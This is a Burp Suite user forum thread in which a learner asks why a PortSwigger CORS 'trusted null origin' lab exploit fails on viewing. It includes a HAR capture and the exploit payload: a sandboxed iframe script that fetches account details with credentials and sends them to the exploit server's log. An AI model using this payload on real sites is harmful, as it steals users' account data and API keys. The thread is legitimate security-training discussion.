Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab CORS vulnerability with trusted null origin: CORS missing allow origin

filippo | Last updated: Feb 07, 2023 02:31PM UTC

Good evening, I'm struggling to solve the lab, it seems to me that the CORS policy is not configured according to the LAB. Following there's my HAR file generated trying to view the exploit. TIA ################################################################################################ { "log": { "version": "1.2", "creator": { "name": "Firefox", "version": "109.0.1" }, "browser": { "name": "Firefox", "version": "109.0.1" }, "pages": [ { "startedDateTime": "2023-02-07T15:27:39.875+01:00", "id": "page_1", "title": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/exploit", "pageTimings": { "onContentLoad": 826, "onLoad": 898 } } ], "entries": [ { "pageref": "page_1", "startedDateTime": "2023-02-07T15:27:39.875+01:00", "request": { "bodySize": 598, "method": "POST", "url": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/", "httpVersion": "HTTP/2", "headers": [ { "name": "Host", "value": "exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net" }, { "name": "User-Agent", "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0" }, { "name": "Accept", "value": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" }, { "name": "Accept-Language", "value": "it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3" }, { "name": "Accept-Encoding", "value": "gzip, deflate, br" }, { "name": "Content-Type", "value": "application/x-www-form-urlencoded" }, { "name": "Content-Length", "value": "598" }, { "name": "Origin", "value": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net" }, { "name": "Connection", "value": "keep-alive" }, { "name": "Referer", "value": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/" }, { "name": "Upgrade-Insecure-Requests", "value": "1" }, { "name": "Sec-Fetch-Dest", "value": "document" }, { "name": "Sec-Fetch-Mode", "value": "navigate" }, { "name": "Sec-Fetch-Site", "value": "same-origin" }, { "name": "Sec-Fetch-User", "value": "?1" }, { "name": "TE", "value": "trailers" } ], "cookies": [], "queryString": [], "headersSize": 746, "postData": { "mimeType": "application/x-www-form-urlencoded", "params": [ { "name": "urlIsHttps", "value": "on" }, { "name": "responseFile", "value": "/exploit" }, { "name": "responseHead", "value": "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8" }, { "name": "responseBody", "value": "<iframe style=\"visibility:hidden\" sandbox=\"allow-scripts\" srcdoc=\"<script> fetch('https://0a9400f0049d2321c133bcfa000500a3.web-security-academy.net/accountDetails', {credentials: 'include'}).then(response => response.text()).then((response) => document.location='/log?k='+encodeURIComponent(response));</script>\"></iframe>\r\n" }, { "name": "formAction", "value": "VIEW_EXPLOIT" } ], "text": "urlIsHttps=on&responseFile=%2Fexploit&responseHead=HTTP%2F1.1+200+OK%0D%0AContent-Type%3A+text%2Fhtml%3B+charset%3Dutf-8&responseBody=%3Ciframe+style%3D%22visibility%3Ahidden%22+sandbox%3D%22allow-scripts%22+srcdoc%3D%22%3Cscript%3E+fetch%28%27https%3A%2F%2F0a9400f0049d2321c133bcfa000500a3.web-security-academy.net%2FaccountDetails%27%2C+%7Bcredentials%3A+%27include%27%7D%29.then%28response+%3D%3E+response.text%28%29%29.then%28%28response%29+%3D%3E+document.location%3D%27%2Flog%3Fk%3D%27%2BencodeURIComponent%28response%29%29%3B%3C%2Fscript%3E%22%3E%3C%2Fiframe%3E%0D%0A&formAction=VIEW_EXPLOIT" } }, "response": { "status": 302, "statusText": "Found", "httpVersion": "HTTP/2", "headers": [ { "name": "location", "value": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/exploit" }, { "name": "server", "value": "Academy Exploit Server" }, { "name": "content-length", "value": "0" }, { "name": "X-Firefox-Spdy", "value": "h2" } ], "cookies": [], "content": { "mimeType": "text/html; charset=utf-8", "size": 324, "comment": "Il corpo delle risposte non è incluso." }, "redirectURL": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/exploit", "headersSize": 178, "bodySize": 502 }, "cache": {}, "timings": { "blocked": 16, "dns": 0, "connect": 0, "ssl": 0, "send": 0, "wait": 346, "receive": 0 }, "time": 362, "_securityState": "secure", "serverIPAddress": "127.0.0.1", "connection": "8080" }, { "pageref": "page_1", "startedDateTime": "2023-02-07T15:27:40.252+01:00", "request": { "bodySize": 0, "method": "GET", "url": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/exploit", "httpVersion": "HTTP/2", "headers": [ { "name": "Host", "value": "exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net" }, { "name": "User-Agent", "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0" }, { "name": "Accept", "value": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" }, { "name": "Accept-Language", "value": "it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3" }, { "name": "Accept-Encoding", "value": "gzip, deflate, br" }, { "name": "Referer", "value": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/" }, { "name": "Connection", "value": "keep-alive" }, { "name": "Upgrade-Insecure-Requests", "value": "1" }, { "name": "Sec-Fetch-Dest", "value": "document" }, { "name": "Sec-Fetch-Mode", "value": "navigate" }, { "name": "Sec-Fetch-Site", "value": "same-origin" }, { "name": "Sec-Fetch-User", "value": "?1" }, { "name": "TE", "value": "trailers" } ], "cookies": [], "queryString": [], "headersSize": 605 }, "response": { "status": 200, "statusText": "OK", "httpVersion": "HTTP/2", "headers": [ { "name": "content-type", "value": "text/html; charset=utf-8" }, { "name": "server", "value": "Academy Exploit Server" }, { "name": "content-length", "value": "324" }, { "name": "X-Firefox-Spdy", "value": "h2" } ], "cookies": [], "content": { "mimeType": "text/html; charset=utf-8", "size": 324, "text": "<iframe style=\"visibility:hidden\" sandbox=\"allow-scripts\" srcdoc=\"<script> fetch('https://0a9400f0049d2321c133bcfa000500a3.web-security-academy.net/accountDetails', {credentials: 'include'}).then(response => response.text()).then((response) => document.location='/log?k='+encodeURIComponent(response));</script>\"></iframe>\r\n" }, "redirectURL": "", "headersSize": 130, "bodySize": 454 }, "cache": {}, "timings": { "blocked": 0, "dns": 0, "connect": 0, "ssl": 0, "send": 0, "wait": 408, "receive": 0 }, "time": 408, "_securityState": "secure", "serverIPAddress": "127.0.0.1", "connection": "8080" }, { "pageref": "page_1", "startedDateTime": "2023-02-07T15:27:40.797+01:00", "request": { "bodySize": 0, "method": "GET", "url": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/favicon.ico", "httpVersion": "HTTP/2", "headers": [ { "name": "Host", "value": "exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net" }, { "name": "User-Agent", "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0" }, { "name": "Accept", "value": "image/avif,image/webp,*/*" }, { "name": "Accept-Language", "value": "it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3" }, { "name": "Accept-Encoding", "value": "gzip, deflate, br" }, { "name": "Connection", "value": "keep-alive" }, { "name": "Referer", "value": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/exploit" }, { "name": "Sec-Fetch-Dest", "value": "image" }, { "name": "Sec-Fetch-Mode", "value": "no-cors" }, { "name": "Sec-Fetch-Site", "value": "same-origin" } ], "cookies": [], "queryString": [], "headersSize": null }, "response": { "status": 200, "statusText": "OK", "httpVersion": "HTTP/2", "headers": [ { "name": "content-type", "value": "image/x-icon" }, { "name": "content-length", "value": "15406" }, { "name": "X-Firefox-Spdy", "value": "h2" } ], "cookies": [], "content": { "mimeType": "image/x-icon", "size": 15406, "encoding": "base64", "text": "AAA....AAA==" }, "redirectURL": "", "headersSize": 0, "bodySize": 15406 }, "cache": {}, "timings": { "blocked": 0, "dns": 0, "ssl": 0, "connect": 0, "send": 0, "wait": 0, "receive": 0 }, "time": 0, "_securityState": "secure" }, { "pageref": "page_1", "startedDateTime": "2023-02-07T15:27:40.817+01:00", "request": { "bodySize": 0, "method": "GET", "url": "https://0a9400f0049d2321c133bcfa000500a3.web-security-academy.net/accountDetails", "httpVersion": "HTTP/2", "headers": [ { "name": "Host", "value": "0a9400f0049d2321c133bcfa000500a3.web-security-academy.net" }, { "name": "User-Agent", "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0" }, { "name": "Accept", "value": "*/*" }, { "name": "Accept-Language", "value": "it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3" }, { "name": "Accept-Encoding", "value": "gzip, deflate, br" }, { "name": "Origin", "value": "null" }, { "name": "Connection", "value": "keep-alive" }, { "name": "Sec-Fetch-Dest", "value": "empty" }, { "name": "Sec-Fetch-Mode", "value": "cors" }, { "name": "Sec-Fetch-Site", "value": "cross-site" } ], "cookies": [], "queryString": [], "headersSize": 405 }, "response": { "status": 401, "statusText": "Unauthorized", "httpVersion": "HTTP/2", "headers": [ { "name": "content-type", "value": "application/json; charset=utf-8" }, { "name": "set-cookie", "value": "session=eYgx2IMcOY58i6DLFRw2KQxHHcYrievz; Secure; HttpOnly; SameSite=None" }, { "name": "content-length", "value": "14" }, { "name": "X-Firefox-Spdy", "value": "h2" } ], "cookies": [ { "name": "session", "value": "eYgx2IMcOY58i6DLFRw2KQxHHcYrievz" } ], "content": { "mimeType": "application/json; charset=utf-8", "size": 0, "text": "" }, "redirectURL": "", "headersSize": 201, "bodySize": 201 }, "cache": {}, "timings": { "blocked": 0, "dns": 1, "connect": 1, "ssl": 0, "send": 47, "wait": -1, "receive": 7576 }, "time": 7625, "_securityState": "secure", "serverIPAddress": "127.0.0.1", "connection": "8080" } ] } }

filippo | Last updated: Feb 08, 2023 07:46AM UTC

Good morning, actually the lab is solved, I mean delivering the exploit to the victim works, and I can see the log's entry containing administrator data in QS, but I cannot understand why my request is blocked viewing the exploit. TIA Filippo

Hannah, PortSwigger Agent | Last updated: Feb 08, 2023 10:02AM UTC

Hi To clarify, when you click on the "View exploit" button, you are not landing on the log page with your API key in the URL? Have you tried following any of the video solutions available?

filippo | Last updated: Feb 08, 2023 03:39PM UTC

Hi Hannah, no, I didn't follow any solutions, apart yours that confirms, even if I used fetch instead of xhr, that my exploit is correct. As I wrote before when I view the exploit I got 401 response from the fetch request to the accountDetails page and I see the iframe without any content loaded. Of course no releated entry is present in the access log, but delivering the exploit to the victim permits to solve the lab. Anyway I dont understand why my fetch request is blocked. I enclose the payload I used: <iframe style="visibility:block" sandbox="allow-scripts" srcdoc="<script> fetch('https://<my_lab_id>.web-security-academy.net/accountDetails', {credentials: 'include'}).then(response => response.text()).then((response) => document.location='/log?k='+encodeURIComponent(response));</script>"></iframe> Thanx F.

Hannah, PortSwigger Agent | Last updated: Feb 14, 2023 11:55AM UTC